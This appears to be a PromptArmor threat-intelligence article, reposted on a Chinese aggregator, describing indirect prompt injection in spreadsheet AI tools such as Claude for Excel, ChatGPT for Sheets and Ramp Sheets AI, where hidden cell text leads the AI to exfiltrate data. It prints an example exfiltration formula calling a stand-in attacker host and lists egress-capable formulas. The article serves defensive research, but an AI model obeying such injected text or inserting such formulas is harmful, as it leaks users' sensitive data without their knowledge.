跳到正文
原文
PromptArmor:Threat Intelligence· PromptArmor:Threat Intelligence·· 2026-03-18精选AI 评分67

PromptArmor 分析 Excel 与 Google Sheets 中 AI 功能的提示词注入与数据外泄风险

AI 导读

PromptArmor 汇总其对电子表格 AI 功能的提示词注入与数据外泄研究,涉及 Claude for Excel、ChatGPT for Google Sheets 和 Ramp Sheets AI 三条已记录攻击链,其中 Ramp 案例已于 2026 年 3 月 16 日修复。

推荐理由

原文基于多起已披露攻击链,归纳出电子表格 AI 的间接提示词注入风险面,并给出可复用的威胁模型和风险来源清单。

正文

Free risk assessment for your AI in spreadsheets vendor

Overview

Spreadsheets are the connective tissue of enterprise data: financial models, customer lists, vendor contracts, employee compensation, board materials. In the past two years, every major spreadsheet platform has shipped AI features, and a growing roster of third-party AI add-ons now runs alongside them: Claude for Excel, Microsoft Copilot in Excel, Google Gemini in Sheets, ChatGPT for Excel and Google Sheets, and standalone AI-native spreadsheet tools like Ramp Sheets are just a few that have hit the market.

PromptArmor has documented attack chains from deployed applications exfiltrating sensitive data through these features:

The pattern is consistent across vendors and platforms - Anthropic, Ramp, OpenAI, Microsoft, Google - AI in spreadsheets is a novel class of prompt injection risk surface. This article maps that category and references the relevant OWASP risks (LLM01:2025 Prompt Injection from the OWASP Top 10 for LLM Applications 2025, and the OWASP Top 10 for Agentic Applications 2026).

The Threat Model

The root risk is indirect prompt injection - LLM01:2025 in the OWASP Top 10, amplified for agentic systems in the Agentic Top 10 - landing on a uniquely permissive attack surface.

Indirect Prompt Injection Threat Model for AI in Spreadsheets

Why spreadsheets are a uniquely dangerous host for AI

Three properties of spreadsheets compound prompt injection risk in ways most other AI integrations don't share.

1. Cell content arrives from untrusted upstream sources by default. Spreadsheets are designed to consume data from external places - imported CSVs, copy-pasted web ranges, exported reports from third-party SaaS, vendor-supplied templates, rows added via integrations and webhooks. Any AI feature that reads cell content treats all of this as part of the prompt, including content no human reviewer ever read closely.

2. AI features in spreadsheets take actions. They write formulas, modify ranges, generate scripts (Office Scripts, Apps Script), build pivots, and can even render images. The space of actions an injected agent can take inside a spreadsheet is wide - and several of those actions trigger external network requests by design.

3. Human-in-the-loop is often absent or too coarse to matter. When an AI inserts =IMAGE("https://attacker/exfil?data=" & SUMMARY(A1:Z100)), the user typically sees an "approve cell edit" prompt without the formula visible - or no prompt at all. Ramp's Sheets AI inserted formulas with no approval gate, and GPT for Excel and Sheets uses one-per-session edit approval that enables multiple future edits; Claude for Excel's first beta showed an "Add visualization" approval that hid the malicious URL until Anthropic improved the interstitial post-disclosure.

Stay informed of every security-relevant configuration change for AI in spreadsheets

Likely sources of untrusted data

The common patterns we see in active investigations:

  • Imported reference datasets (industry benchmarks, market data, competitor pricing) copy-pasted from web sources or shared drives - the vector in both the CellShock and Ramp attack chains

  • Exported tables from internal SaaS (CRMs, ticketing, HRIS) where source apps allow free-text fields editable by vendors, customers, partners, or candidates

  • Email-to-row integrations that turn inbound emails into spreadsheet rows

  • Scraped content via IMPORTHTML, IMPORTXML, paste-special, or Apps Script

  • Vendor-supplied templates (RFP responses, due-diligence questionnaires) opened directly in the user's environment

Hidden text - white-on-white, one-pixel font, content concealed in unused columns - is the standard concealment technique and is what was used in both documented attack chains.

Actions an injected agent can take

Once injection lands, the high-impact action surface clusters into three areas:

  • Insert egress-capable formulas: =IMAGE(URL) (loads from URL), =WEBSERVICE(URL) (Excel), =IMPORTDATA(URL) / =IMPORTXML(URL) (Sheets), =HYPERLINK(URL,label) (becomes click-through), and Apps Script-resolvable custom functions. Combined with concatenated cell data, any of these is an exfiltration channel.

  • Write or modify cells across the workbook. Sensitive data from one sheet can be aggregated into the formula payload of another sheet that the user is unlikely to inspect.

  • Generate and run scripts. Office Scripts in Excel and Apps Script in Sheets execute with the user's identity, and in some cases can make API calls outside the document entirely. AI-generated Python in Excel (Advanced Analysis with Copilot) can be manipulated to programmatically aggregate data for exfiltration.

Malware in spreadsheets: old problem, new surface

Spreadsheets have been a malware delivery vehicle for decades. Macro viruses, embedded executables, malicious add-in installers, and exploit-laden XLL files have all turned opening a workbook into running attacker code. Defenders responded by hardening the file format itself: blocking macros from internet-sourced files, sensitivity labeling, Trust Center deployment of approved templates, Mark of the Web enforcement, and disabling unsigned add-ins by default. CISA's standing alert on macro-based malware frames the lineage bluntly: "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems."

AI features in spreadsheets are the same risk class on a new substrate. The malicious payload no longer has to be code - it can be plain text in a cell, processed by an AI agent that then chooses to take a malicious action on the user's behalf. Prompt injection makes any cell containing untrusted text potentially executable. The blast radius is wider than macros (any cell, by anyone with edit access, at any time after the file was created), and the existing macro-era controls (Mark of the Web, Trust Center, IRM, signed-macro policies) do not apply because the dangerous content is just text. This is a novel category of risk surface, recognizable across multiple unrelated vendor implementations.

Leading AI in Spreadsheet Tools and How They Mitigate Risk

AI Spreadsheet Tools
Security Posture

1

Claude for Excel

Claude for ExcelAnthropic

M365 sidebar add-in that reads multi-tab workbooks, edits cells, builds formulas, pivot tables, and full financial models.

2

ChatGPT for Excel & Sheets

ChatGPT for Excel & SheetsOpenAI

First-party add-on for Excel and Google Sheets. Builds spreadsheets, edits formulas, gets insights across tabs, updates in real time.

3

Ramp Sheets AI

Ramp Sheets AIRamp

AI-native web spreadsheet - upload Excel or CSV, parse bank statements, build financial models. Separate from the Ramp for Excel connector.

4

Copilot in Excel

Copilot in ExcelMicrosoft

Native M365 AI in the Excel ribbon. Suggests and explains formulas, summarizes ranges, generates charts, PivotTables, and Python analysis.

5

Gemini in Sheets

Gemini in SheetsGoogle

Native Workspace AI. Generates table templates, summarizes and analyzes data in a side panel, and offers AI formula suggestions.

6

Rows

RowsRows

AI-native spreadsheet with built-in data integrations. Summarize, transform, and analyze data with AI directly inside the grid.

7

Sourcetable

SourcetableSourcetable

AI spreadsheet that connects to databases and APIs. Ask questions in plain English to query, transform, and visualize data.

8

Coefficient

CoefficientCoefficient

AI-powered connector for Google Sheets and Excel. Pulls live data from CRMs, databases, and BI tools with natural-language commands.

9

Julius AI

Julius AIJulius

AI data analyst - upload spreadsheets or connect data sources and ask Julius to analyze, chart, and generate insights conversationally.

10

Numerous.ai

Numerous.aiNumerous

AI formula add-in for Google Sheets. =AI() custom function lets users prompt GPT-4 from any cell to generate content, classify, or extract data.

Updated July 2026 · PromptArmor Research

PromptArmor Threat Intelligence

Is your organization protected from AI in vendors?

PromptArmor continuously monitors across your portfolio of third party AI in vendors, skills, plugins, connectors, MCP servers, models and more.

We detect vulnerabilities and changes like this, surfacing risk before it becomes an incident.

Learn more

来源:PromptArmor:Threat Intelligence · promptarmor.com